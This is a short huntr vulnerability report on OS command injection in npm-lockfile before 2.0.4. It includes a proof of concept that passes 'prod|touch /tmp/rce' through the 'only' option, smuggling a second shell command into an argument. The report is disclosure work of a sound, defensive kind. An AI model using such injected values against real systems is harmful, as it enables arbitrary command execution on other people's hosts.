OS Command Injection

huntr report 4F806DC9-2ECD-4E79-997E-5292F1BEA9F1
Reported by xiaofen9 on Feb 28, 2022, 7:32 p.m. (www.huntr.dev)

EPSS: 0.003 (Low), percentile 69.8%

Description

npm-lockfile before 2.0.4 does not sanitize untrusted external input and passes it to a sensitive command-execution API, resulting in a command injection vulnerability.

Proof of Concept

// Install a vulnerable release: npm i npm-lockfile@<version before 2.0.4>
const getLockfile = require('npm-lockfile/getLockfile');

// The "only" option reaches a shell command unsanitized: the "|" ends the
// intended argument and "touch /tmp/rce" runs as a second command.
getLockfile("./package-lock.json", "08/01/2022", { "only": "prod|touch /tmp/rce" }); // a file named rce will be created at /tmp

Impact

This vulnerability allows execution of arbitrary commands on the host operating system.
